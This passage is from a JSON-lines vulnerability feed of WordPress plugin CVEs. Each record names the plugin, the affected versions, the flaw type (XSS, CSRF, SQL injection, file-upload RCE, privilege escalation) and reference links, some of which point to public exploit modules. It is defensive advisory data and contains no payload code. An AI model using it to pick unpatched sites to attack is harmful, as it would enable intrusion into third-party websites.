patch.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-child.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-child.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L788\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L788\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mainwp-child\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mainwp-child\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9156e536-a58e-4d78-b136-af8a9613ee23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9156e536-a58e-4d78-b136-af8a9613ee23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12540","slug":"ldd-directory-lite","versionImpact":"3.3","description":"The LDD Directory Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldd-directory-lite\\\/trunk\\\/templates\\\/frontend\\\/edit-submit.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldd-directory-lite\\\/trunk\\\/templates\\\/frontend\\\/edit-submit.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldd-directory-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldd-directory-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7675e1c-7194-4cfe-81fb-a78d75e0bb1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7675e1c-7194-4cfe-81fb-a78d75e0bb1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13426","slug":"wp-polls","versionImpact":"2.77.2","description":"The WP-Polls plugin for WordPress is vulnerable to SQL Injection via COOKIE in all versions up to, and including, 2.77.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries. Those queries are stored and results are not displayed to the attacker, which means they cannot be exploited to obtain any additional information about the database. However, a properly configured payload allows for the injection of malicious JavaScript resulting in Stored Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L294\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L294\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L97\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1378\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1416\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPress\\\/wordpress-develop\\\/blob\\\/a82874058f58575dbba64ce09b6dcbd43ccf5fdc\\\/src\\\/wp-includes\\\/default-constants.php#L249\",\"name\":\"https:\\\/\\\/github.com\\\/WordPress\\\/wordpress-develop\\\/blob\\\/a82874058f58575dbba64ce09b6dcbd43ccf5fdc\\\/src\\\/wp-includes\\\/default-constants.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3224709%40wp-polls%2Ftrunk&old=2949758%40wp-polls%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3224709%40wp-polls%2Ftrunk&old=2949758%40wp-polls%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-polls\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-polls\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76de574-2627-46cd-9817-134a009ac3bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b76de574-2627-46cd-9817-134a009ac3bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1769","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.5.0 via the download_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary log files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4df60fbe-4475-4cbf-b497-a9c5251bc91f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4df60fbe-4475-4cbf-b497-a9c5251bc91f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3101","slug":"amz-configurator-core","versionImpact":"1.4.7","description":"The Configurator Theme Core plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.4.7. This is due to the plugin not properly validating user meta fields prior to updating them in the database. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change escalate their privileges to Administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/configurator-woocommerce-wordpress-theme\\\/20474230\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/configurator-woocommerce-wordpress-theme\\\/20474230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535aa061-479f-415e-bee6-3151c42b917e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535aa061-479f-415e-bee6-3151c42b917e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10027","slug":"wp-property","description":"WP-Property plugin for WordPress through version 1.35.0 contains an unauthenticated file upload vulnerability in the third-party `uploadify.php` script. A remote attacker can upload arbitrary PHP files to a temporary directory without authentication, leading to remote code execution.","refs":"[{\"url\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150103065650\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-wp-property-shell-upload-vulnerability.html\",\"name\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150103065650\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-wp-property-shell-upload-vulnerability.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_property_upload_exec.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_property_upload_exec.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-property\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-property\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18987\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18987\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23651\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23651\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-wp-property-php-file-upload\",\"name\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-wp-property-php-file-upload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25065","slug":"wp-expand-tabs-free","versionImpact":"2.1.14","description":"Cross-Site Request Forgery (CSRF) vulnerability in ShapedPlugin WP Tabs \u2013 Responsive Tabs Plugin for WordPress plugin <= 2.1.14 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-expand-tabs-free\\\/wordpress-wp-tabs-responsive-tabs-plugin-for-wordpress-plugin-2-1-14-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-expand-tabs-free\\\/wordpress-wp-tabs-responsive-tabs-plugin-for-wordpress-plugin-2-1-14-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1921","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_start_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c7c61d-c110-448e-ad8a-bc1c00393524?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c7c61d-c110-448e-ad8a-bc1c00393524?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5911","slug":"wp-custom-cursors","versionImpact":"3.2","description":"The WP Custom Cursors | WordPress Cursor Plugin WordPress plugin through 3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dde0767d-1dff-4261-adbe-1f3fdf2d9aae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dde0767d-1dff-4261-adbe-1f3fdf2d9aae\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1379","slug":"website-article-monetization-by-magenet","versionImpact":"1.0.11","description":"The Website Article Monetization By MageNet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'abp_auth_key' parameter in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping and a missing authorization check. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8564dbb-6be8-4999-be65-d28609e05451?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8564dbb-6be8-4999-be65-d28609e05451?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-article-monetization-by-magenet\\\/trunk\\\/admin\\\/article-backlinks-admin.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-article-monetization-by-magenet\\\/trunk\\\/admin\\\/article-backlinks-admin.php#L110\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5666","slug":"extensions-for-elementor","versionImpact":"2.0.30","description":"The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter within the EE Button widget in all versions up to, and including, 2.0.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63306df3-4972-426f-bfda-6af75a09971c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63306df3-4972-426f-bfda-6af75a09971c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/button\\\/widgets\\\/ee-button.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/button\\\/widgets\\\/ee-button.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104024\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104024\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9064","slug":"inline-svg-elementor","versionImpact":"1.2.0","description":"The Elementor Inline SVG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aab3dea-5d14-4316-9a4c-97b0d30762bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aab3dea-5d14-4316-9a4c-97b0d30762bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-svg-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-svg-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9967","slug":"wp-show-more","versionImpact":"1.0.7","description":"The WP show more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's show_more shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de269b5-7262-45c8-8819-00982f196597?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de269b5-7262-45c8-8819-00982f196597?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-show-more\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-show-more\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-show-more\\\/trunk\\\/wp-show-more.php#L31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11935","slug":"email-address-obfuscation","versionImpact":"1.0.1","description":"The Email Address Obfuscation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-address-obfuscation\\\/trunk\\\/email-address-obfuscation.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-address-obfuscation\\\/trunk\\\/email-address-obfuscation.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201993\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201993\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-address-obfuscation\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-address-obfuscation\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b777b19-ca0a-4082-80ee-e18a31ba6308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b777b19-ca0a-4082-80ee-e18a31ba6308?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12611","slug":"school-management","versionImpact":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'title' parameter in all versions up to, and including, 93.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45ada7a4-466b-4e73-8869-e1178e4fc67a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45ada7a4-466b-4e73-8869-e1178e4fc67a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10026","slug":"asset-manager","description":"The WordPress plugin Asset-Manager version 2.0 and below contains an unauthenticated arbitrary file upload vulnerability in upload.php. The endpoint fails to properly validate and restrict uploaded file types, allowing remote attackers to upload malicious PHP scripts to a predictable temporary directory. Once uploaded, the attacker can execute the file via a direct HTTP GET request, resulting in remote code execution under the web server\u2019s context.","refs":"[{\"url\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150106144832\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-asset-manager-shell-upload-vulnerability.html\",\"name\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20150106144832\\\/http:\\\/\\\/www.opensyscom.fr:80\\\/Actualites\\\/wordpress-plugins-asset-manager-shell-upload-vulnerability.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_asset_manager_upload_exec.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_asset_manager_upload_exec.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/asset-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/asset-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18993\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/18993\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23652\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23652\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-asset-manager-php-file-upload\",\"name\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-asset-manager-php-file-upload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-46862","slug":"quiz-master-next","versionImpact":"8.0.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master \u2013 Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-7-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-7-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1920","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_purgecache_varnish_callback function. This makes it possible for unauthenticated attackers to purge the varnish cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8e90994-3b5c-4ae6-a27f-890a9101b440?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8e90994-3b5c-4ae6-a27f-890a9101b440?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5337","slug":"formforall","versionImpact":"1.2","description":"The Contact form Form For All plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formforall' shortcode in versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formforall\\\/trunk\\\/formforall_common.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formforall\\\/trunk\\\/formforall_common.php#L21\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe2f596-b2c3-49d3-b646-0f4b64f15674?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe2f596-b2c3-49d3-b646-0f4b64f15674?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
